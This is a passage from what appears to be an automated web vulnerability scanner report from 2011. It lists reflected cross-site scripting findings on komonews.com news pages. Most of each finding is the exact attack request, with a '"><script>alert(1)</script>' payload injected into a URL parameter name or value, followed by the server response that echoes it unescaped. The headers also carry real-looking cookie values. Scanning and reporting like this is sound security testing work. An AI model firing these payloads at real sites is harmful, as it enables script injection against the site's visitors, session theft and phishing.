Winter Sto ...[SNIP]... <a name="fb_share" type="box_count" share_url="http://www.komonews.com/news/116694569.html?59b98"><script>alert(1)</script>98d22e6ce5=1" href="http://www.facebook.com/sharer.php"> ...[SNIP]...
The value of the skipthumb request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ca5bc"><script>alert(1)</script>3578d8357a5 was submitted in the skipthumb parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /news/116694569.html?skipthumb=Yca5bc"><script>alert(1)</script>3578d8357a5 HTTP/1.1 Host: www.komonews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: click_mobile=0; __gads=ID=fb409a40cfdb27ca:T=1298497019:S=ALNI_MZ18Qu30UeFAwl_7XbivFuKSXIyQg; __utmz=215150093.1298497003.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); dsnslfpop=1298756207170; __utma=215150093.758392942.1298497003.1298497003.1298497003.1; _vaHC=holdout=false; _vaEngT=1298496998074=10493; __utmc=215150093; _vaTC=uuid=db5fdb52-b687-4958-8cec-e4618ad7c232&cId=hdzFu7&track=true&sendSess=false&seq=3&intEngTimeReport=15000&lastAccess=1298497090922; __utmb=215150093.7.9.1298497088476;
Response
HTTP/1.1 200 OK Server: Apache X-Server-Name: sj-c14-r8-u22-b5 Content-Type: text/html;charset=utf-8 Date: Wed, 23 Feb 2011 22:13:40 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: click_mobile=0 Content-Length: 62511
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns:fb="http://facebook.com/2008/fbml"> <head> <title>
Winter Sto ...[SNIP]... <a name="fb_share" type="box_count" share_url="http://www.komonews.com/news/116694569.html?skipthumb=Yca5bc"><script>alert(1)</script>3578d8357a5" href="http://www.facebook.com/sharer.php"> ...[SNIP]...
1.412. http://www.komonews.com/news/116694614.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.komonews.com
Path:
/news/116694614.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bb865"><script>alert(1)</script>0db0d2d78f9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /news/116694614.html?bb865"><script>alert(1)</script>0db0d2d78f9=1 HTTP/1.1 Host: www.komonews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: click_mobile=0; __gads=ID=fb409a40cfdb27ca:T=1298497019:S=ALNI_MZ18Qu30UeFAwl_7XbivFuKSXIyQg; __utmz=215150093.1298497003.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); dsnslfpop=1298756207170; __utma=215150093.758392942.1298497003.1298497003.1298497003.1; _vaHC=holdout=false; _vaEngT=1298496998074=10493; __utmc=215150093; _vaTC=uuid=db5fdb52-b687-4958-8cec-e4618ad7c232&cId=hdzFu7&track=true&sendSess=false&seq=3&intEngTimeReport=15000&lastAccess=1298497090922; __utmb=215150093.7.9.1298497088476;
Response
HTTP/1.1 200 OK Server: Apache X-Server-Name: dv-c1-r2-u7-b6 Content-Type: text/html;charset=utf-8 Date: Wed, 23 Feb 2011 22:13:56 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: click_mobile=0 Content-Length: 54796
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns:fb="http://facebook.com/2008/fbml"> <head> <title>
Police off ...[SNIP]... <a name="fb_share" type="box_count" share_url="http://www.komonews.com/news/116694614.html?bb865"><script>alert(1)</script>0db0d2d78f9=1" href="http://www.facebook.com/sharer.php"> ...[SNIP]...
1.413. http://www.komonews.com/news/116707379.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.komonews.com
Path:
/news/116707379.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 250e3"><script>alert(1)</script>284a71de2fb was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /news/116707379.html?250e3"><script>alert(1)</script>284a71de2fb=1 HTTP/1.1 Host: www.komonews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: click_mobile=0; __gads=ID=fb409a40cfdb27ca:T=1298497019:S=ALNI_MZ18Qu30UeFAwl_7XbivFuKSXIyQg; __utmz=215150093.1298497003.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); dsnslfpop=1298756207170; __utma=215150093.758392942.1298497003.1298497003.1298497003.1; _vaHC=holdout=false; _vaEngT=1298496998074=10493; __utmc=215150093; _vaTC=uuid=db5fdb52-b687-4958-8cec-e4618ad7c232&cId=hdzFu7&track=true&sendSess=false&seq=3&intEngTimeReport=15000&lastAccess=1298497090922; __utmb=215150093.7.9.1298497088476;
Response
HTTP/1.1 200 OK Server: Apache X-Server-Name: dv-c1-r1-u24-b6 Content-Type: text/html;charset=utf-8 Date: Wed, 23 Feb 2011 22:14:02 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: click_mobile=0 Content-Length: 61086
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns:fb="http://facebook.com/2008/fbml"> <head> <title>
Tuba Man k ...[SNIP]... <a name="fb_share" type="box_count" share_url="http://www.komonews.com/news/116707379.html?250e3"><script>alert(1)</script>284a71de2fb=1" href="http://www.facebook.com/sharer.php"> ...[SNIP]...
1.414. http://www.komonews.com/news/116727124.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.komonews.com
Path:
/news/116727124.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7249e"><script>alert(1)</script>3476c1f423c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /news/116727124.html?7249e"><script>alert(1)</script>3476c1f423c=1 HTTP/1.1 Host: www.komonews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: click_mobile=0; __gads=ID=fb409a40cfdb27ca:T=1298497019:S=ALNI_MZ18Qu30UeFAwl_7XbivFuKSXIyQg; __utmz=215150093.1298497003.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); dsnslfpop=1298756207170; __utma=215150093.758392942.1298497003.1298497003.1298497003.1; _vaHC=holdout=false; _vaEngT=1298496998074=10493; __utmc=215150093; _vaTC=uuid=db5fdb52-b687-4958-8cec-e4618ad7c232&cId=hdzFu7&track=true&sendSess=false&seq=3&intEngTimeReport=15000&lastAccess=1298497090922; __utmb=215150093.7.9.1298497088476;
Response
HTTP/1.1 200 OK Server: Apache X-Server-Name: dv-c1-r2-u24-b14 Content-Type: text/html;charset=utf-8 Date: Wed, 23 Feb 2011 22:13:57 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: click_mobile=0 Content-Length: 63420
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns:fb="http://facebook.com/2008/fbml"> <head> <title>
Snow begin ...[SNIP]... <a name="fb_share" type="box_count" share_url="http://www.komonews.com/news/116727124.html?7249e"><script>alert(1)</script>3476c1f423c=1" href="http://www.facebook.com/sharer.php"> ...[SNIP]...
1.415. http://www.komonews.com/news/boeing/116707614.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.komonews.com
Path:
/news/boeing/116707614.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e6391"><script>alert(1)</script>5ee4a5ffd14 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /news/boeing/116707614.html?e6391"><script>alert(1)</script>5ee4a5ffd14=1 HTTP/1.1 Host: www.komonews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: click_mobile=0; __gads=ID=fb409a40cfdb27ca:T=1298497019:S=ALNI_MZ18Qu30UeFAwl_7XbivFuKSXIyQg; __utmz=215150093.1298497003.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); dsnslfpop=1298756207170; __utma=215150093.758392942.1298497003.1298497003.1298497003.1; _vaHC=holdout=false; _vaEngT=1298496998074=10493; __utmc=215150093; _vaTC=uuid=db5fdb52-b687-4958-8cec-e4618ad7c232&cId=hdzFu7&track=true&sendSess=false&seq=3&intEngTimeReport=15000&lastAccess=1298497090922; __utmb=215150093.7.9.1298497088476;
Response
HTTP/1.1 200 OK Server: Apache X-Server-Name: sj-c14-r8-u22-b5 Content-Type: text/html;charset=utf-8 Date: Wed, 23 Feb 2011 22:13:01 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: click_mobile=0 Content-Length: 59072
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns:fb="http://facebook.com/2008/fbml"> <head> <title>
Aircraft t ...[SNIP]... <a name="fb_share" type="box_count" share_url="http://www.komonews.com/news/boeing/116707614.html?e6391"><script>alert(1)</script>5ee4a5ffd14=1" href="http://www.facebook.com/sharer.php"> ...[SNIP]...
1.416. http://www.komonews.com/news/business/116735244.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.komonews.com
Path:
/news/business/116735244.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e305c"><script>alert(1)</script>26818fe7053 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /news/business/116735244.html?e305c"><script>alert(1)</script>26818fe7053=1 HTTP/1.1 Host: www.komonews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: click_mobile=0; __gads=ID=fb409a40cfdb27ca:T=1298497019:S=ALNI_MZ18Qu30UeFAwl_7XbivFuKSXIyQg; __utmz=215150093.1298497003.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); dsnslfpop=1298756207170; __utma=215150093.758392942.1298497003.1298497003.1298497003.1; _vaHC=holdout=false; _vaEngT=1298496998074=10493; __utmc=215150093; _vaTC=uuid=db5fdb52-b687-4958-8cec-e4618ad7c232&cId=hdzFu7&track=true&sendSess=false&seq=3&intEngTimeReport=15000&lastAccess=1298497090922; __utmb=215150093.7.9.1298497088476;
Response
HTTP/1.1 200 OK Server: Apache X-Server-Name: dv-c1-r2-u24-b14 Content-Type: text/html;charset=utf-8 Date: Wed, 23 Feb 2011 22:13:51 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: click_mobile=0 Content-Length: 57087
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns:fb="http://facebook.com/2008/fbml"> <head> <title>
1.417. http://www.komonews.com/news/business/116739564.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.komonews.com
Path:
/news/business/116739564.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fdbc4"><script>alert(1)</script>be01c09fb7 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /news/business/116739564.html?fdbc4"><script>alert(1)</script>be01c09fb7=1 HTTP/1.1 Host: www.komonews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: click_mobile=0; __gads=ID=fb409a40cfdb27ca:T=1298497019:S=ALNI_MZ18Qu30UeFAwl_7XbivFuKSXIyQg; __utmz=215150093.1298497003.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); dsnslfpop=1298756207170; __utma=215150093.758392942.1298497003.1298497003.1298497003.1; _vaHC=holdout=false; _vaEngT=1298496998074=10493; __utmc=215150093; _vaTC=uuid=db5fdb52-b687-4958-8cec-e4618ad7c232&cId=hdzFu7&track=true&sendSess=false&seq=3&intEngTimeReport=15000&lastAccess=1298497090922; __utmb=215150093.7.9.1298497088476;
Response
HTTP/1.1 200 OK Server: Apache X-Server-Name: dv-c1-r1-u24-b6 Content-Type: text/html;charset=utf-8 Date: Wed, 23 Feb 2011 22:13:56 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: click_mobile=0 Content-Length: 53713
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns:fb="http://facebook.com/2008/fbml"> <head> <title>
Top SEC la ...[SNIP]... <a name="fb_share" type="box_count" share_url="http://www.komonews.com/news/business/116739564.html?fdbc4"><script>alert(1)</script>be01c09fb7=1" href="http://www.facebook.com/sharer.php"> ...[SNIP]...
1.418. http://www.komonews.com/news/business/116739939.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.komonews.com
Path:
/news/business/116739939.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 99328"><script>alert(1)</script>147a401db4e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /news/business/116739939.html?99328"><script>alert(1)</script>147a401db4e=1 HTTP/1.1 Host: www.komonews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: click_mobile=0; __gads=ID=fb409a40cfdb27ca:T=1298497019:S=ALNI_MZ18Qu30UeFAwl_7XbivFuKSXIyQg; __utmz=215150093.1298497003.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); dsnslfpop=1298756207170; __utma=215150093.758392942.1298497003.1298497003.1298497003.1; _vaHC=holdout=false; _vaEngT=1298496998074=10493; __utmc=215150093; _vaTC=uuid=db5fdb52-b687-4958-8cec-e4618ad7c232&cId=hdzFu7&track=true&sendSess=false&seq=3&intEngTimeReport=15000&lastAccess=1298497090922; __utmb=215150093.7.9.1298497088476;
Response
HTTP/1.1 200 OK Server: Apache X-Server-Name: dv-c1-r2-u7-b6 Content-Type: text/html;charset=utf-8 Date: Wed, 23 Feb 2011 22:13:56 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: click_mobile=0 Content-Length: 57239
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns:fb="http://facebook.com/2008/fbml"> <head> <title>
HP shares ...[SNIP]... <a name="fb_share" type="box_count" share_url="http://www.komonews.com/news/business/116739939.html?99328"><script>alert(1)</script>147a401db4e=1" href="http://www.facebook.com/sharer.php"> ...[SNIP]...
1.419. http://www.komonews.com/news/business/116740159.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.komonews.com
Path:
/news/business/116740159.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6b05d"><script>alert(1)</script>15b6b16a6d7 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /news/business/116740159.html?6b05d"><script>alert(1)</script>15b6b16a6d7=1 HTTP/1.1 Host: www.komonews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: click_mobile=0; __gads=ID=fb409a40cfdb27ca:T=1298497019:S=ALNI_MZ18Qu30UeFAwl_7XbivFuKSXIyQg; __utmz=215150093.1298497003.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); dsnslfpop=1298756207170; __utma=215150093.758392942.1298497003.1298497003.1298497003.1; _vaHC=holdout=false; _vaEngT=1298496998074=10493; __utmc=215150093; _vaTC=uuid=db5fdb52-b687-4958-8cec-e4618ad7c232&cId=hdzFu7&track=true&sendSess=false&seq=3&intEngTimeReport=15000&lastAccess=1298497090922; __utmb=215150093.7.9.1298497088476;
Response
HTTP/1.1 200 OK Server: Apache X-Server-Name: sj-c14-r8-u22-b5 Content-Type: text/html;charset=utf-8 Date: Wed, 23 Feb 2011 22:13:47 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: click_mobile=0 Content-Length: 55979
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns:fb="http://facebook.com/2008/fbml"> <head> <title>
1.420. http://www.komonews.com/news/business/116740389.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.komonews.com
Path:
/news/business/116740389.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d9bd1"><script>alert(1)</script>5502d67dd02 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /news/business/116740389.html?d9bd1"><script>alert(1)</script>5502d67dd02=1 HTTP/1.1 Host: www.komonews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: click_mobile=0; __gads=ID=fb409a40cfdb27ca:T=1298497019:S=ALNI_MZ18Qu30UeFAwl_7XbivFuKSXIyQg; __utmz=215150093.1298497003.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); dsnslfpop=1298756207170; __utma=215150093.758392942.1298497003.1298497003.1298497003.1; _vaHC=holdout=false; _vaEngT=1298496998074=10493; __utmc=215150093; _vaTC=uuid=db5fdb52-b687-4958-8cec-e4618ad7c232&cId=hdzFu7&track=true&sendSess=false&seq=3&intEngTimeReport=15000&lastAccess=1298497090922; __utmb=215150093.7.9.1298497088476;
Response
HTTP/1.1 200 OK Server: Apache X-Server-Name: sj-c14-r8-u22-b5 Content-Type: text/html;charset=utf-8 Date: Wed, 23 Feb 2011 22:13:44 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: click_mobile=0 Content-Length: 54978
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns:fb="http://facebook.com/2008/fbml"> <head> <title>
1.421. http://www.komonews.com/news/consumer/116673109.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.komonews.com
Path:
/news/consumer/116673109.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e470e"><script>alert(1)</script>85c862ec889 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /news/consumer/116673109.html?e470e"><script>alert(1)</script>85c862ec889=1 HTTP/1.1 Host: www.komonews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: click_mobile=0; __gads=ID=fb409a40cfdb27ca:T=1298497019:S=ALNI_MZ18Qu30UeFAwl_7XbivFuKSXIyQg; __utmz=215150093.1298497003.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); dsnslfpop=1298756207170; __utma=215150093.758392942.1298497003.1298497003.1298497003.1; _vaHC=holdout=false; _vaEngT=1298496998074=10493; __utmc=215150093; _vaTC=uuid=db5fdb52-b687-4958-8cec-e4618ad7c232&cId=hdzFu7&track=true&sendSess=false&seq=3&intEngTimeReport=15000&lastAccess=1298497090922; __utmb=215150093.7.9.1298497088476;
Response
HTTP/1.1 200 OK Server: Apache X-Server-Name: sj-c14-r8-u38-b3 Content-Type: text/html;charset=utf-8 Date: Wed, 23 Feb 2011 22:13:27 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: click_mobile=0 Content-Length: 55034
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns:fb="http://facebook.com/2008/fbml"> <head> <title>
Not too la ...[SNIP]... <a name="fb_share" type="box_count" share_url="http://www.komonews.com/news/consumer/116673109.html?e470e"><script>alert(1)</script>85c862ec889=1" href="http://www.facebook.com/sharer.php"> ...[SNIP]...
1.422. http://www.komonews.com/news/consumer/116704069.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.komonews.com
Path:
/news/consumer/116704069.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 299af"><script>alert(1)</script>0d1f4bdf7a1 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /news/consumer/116704069.html?299af"><script>alert(1)</script>0d1f4bdf7a1=1 HTTP/1.1 Host: www.komonews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: click_mobile=0; __gads=ID=fb409a40cfdb27ca:T=1298497019:S=ALNI_MZ18Qu30UeFAwl_7XbivFuKSXIyQg; __utmz=215150093.1298497003.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); dsnslfpop=1298756207170; __utma=215150093.758392942.1298497003.1298497003.1298497003.1; _vaHC=holdout=false; _vaEngT=1298496998074=10493; __utmc=215150093; _vaTC=uuid=db5fdb52-b687-4958-8cec-e4618ad7c232&cId=hdzFu7&track=true&sendSess=false&seq=3&intEngTimeReport=15000&lastAccess=1298497090922; __utmb=215150093.7.9.1298497088476;
Response
HTTP/1.1 200 OK Server: Apache X-Server-Name: sj-c14-r8-u38-b3 Content-Type: text/html;charset=utf-8 Date: Wed, 23 Feb 2011 22:13:35 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: click_mobile=0 Content-Length: 54318
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns:fb="http://facebook.com/2008/fbml"> <head> <title>
Your credi ...[SNIP]... <a name="fb_share" type="box_count" share_url="http://www.komonews.com/news/consumer/116704069.html?299af"><script>alert(1)</script>0d1f4bdf7a1=1" href="http://www.facebook.com/sharer.php"> ...[SNIP]...
1.423. http://www.komonews.com/news/entertainment/116123569.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.komonews.com
Path:
/news/entertainment/116123569.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 24b06"><script>alert(1)</script>51dacf53101 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /news/entertainment/116123569.html?24b06"><script>alert(1)</script>51dacf53101=1 HTTP/1.1 Host: www.komonews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: click_mobile=0; __gads=ID=fb409a40cfdb27ca:T=1298497019:S=ALNI_MZ18Qu30UeFAwl_7XbivFuKSXIyQg; __utmz=215150093.1298497003.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); dsnslfpop=1298756207170; __utma=215150093.758392942.1298497003.1298497003.1298497003.1; _vaHC=holdout=false; _vaEngT=1298496998074=10493; __utmc=215150093; _vaTC=uuid=db5fdb52-b687-4958-8cec-e4618ad7c232&cId=hdzFu7&track=true&sendSess=false&seq=3&intEngTimeReport=15000&lastAccess=1298497090922; __utmb=215150093.7.9.1298497088476;
Response
HTTP/1.1 200 OK Server: Apache X-Server-Name: sj-c14-r8-u22-b5 Content-Type: text/html;charset=utf-8 Date: Wed, 23 Feb 2011 22:13:17 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: click_mobile=0 Content-Length: 40669
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns:fb="http://facebook.com/2008/fbml"> <head> <title>
Photo gall ...[SNIP]... <a name="fb_share" type="box_count" share_url="http://www.komonews.com/news/entertainment/116123569.html?24b06"><script>alert(1)</script>51dacf53101=1" href="http://www.facebook.com/sharer.php"> ...[SNIP]...
1.424. http://www.komonews.com/news/entertainment/116189709.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.komonews.com
Path:
/news/entertainment/116189709.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d14dd"><script>alert(1)</script>cf3829b5cae was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /news/entertainment/116189709.html?d14dd"><script>alert(1)</script>cf3829b5cae=1 HTTP/1.1 Host: www.komonews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: click_mobile=0; __gads=ID=fb409a40cfdb27ca:T=1298497019:S=ALNI_MZ18Qu30UeFAwl_7XbivFuKSXIyQg; __utmz=215150093.1298497003.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); dsnslfpop=1298756207170; __utma=215150093.758392942.1298497003.1298497003.1298497003.1; _vaHC=holdout=false; _vaEngT=1298496998074=10493; __utmc=215150093; _vaTC=uuid=db5fdb52-b687-4958-8cec-e4618ad7c232&cId=hdzFu7&track=true&sendSess=false&seq=3&intEngTimeReport=15000&lastAccess=1298497090922; __utmb=215150093.7.9.1298497088476;
Response
HTTP/1.1 200 OK Server: Apache X-Server-Name: sj-c14-r8-u38-b3 Content-Type: text/html;charset=utf-8 Date: Wed, 23 Feb 2011 22:13:20 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: click_mobile=0 Content-Length: 56794
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns:fb="http://facebook.com/2008/fbml"> <head> <title>
Earth to J ...[SNIP]... <a name="fb_share" type="box_count" share_url="http://www.komonews.com/news/entertainment/116189709.html?d14dd"><script>alert(1)</script>cf3829b5cae=1" href="http://www.facebook.com/sharer.php"> ...[SNIP]...
1.425. http://www.komonews.com/news/entertainment/116665019.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.komonews.com
Path:
/news/entertainment/116665019.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b6f03"><script>alert(1)</script>7c279062389 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /news/entertainment/116665019.html?b6f03"><script>alert(1)</script>7c279062389=1 HTTP/1.1 Host: www.komonews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: click_mobile=0; __gads=ID=fb409a40cfdb27ca:T=1298497019:S=ALNI_MZ18Qu30UeFAwl_7XbivFuKSXIyQg; __utmz=215150093.1298497003.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); dsnslfpop=1298756207170; __utma=215150093.758392942.1298497003.1298497003.1298497003.1; _vaHC=holdout=false; _vaEngT=1298496998074=10493; __utmc=215150093; _vaTC=uuid=db5fdb52-b687-4958-8cec-e4618ad7c232&cId=hdzFu7&track=true&sendSess=false&seq=3&intEngTimeReport=15000&lastAccess=1298497090922; __utmb=215150093.7.9.1298497088476;
Response
HTTP/1.1 200 OK Server: Apache X-Server-Name: sj-c14-r8-u38-b3 Content-Type: text/html;charset=utf-8 Date: Wed, 23 Feb 2011 22:13:14 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: click_mobile=0 Content-Length: 53897
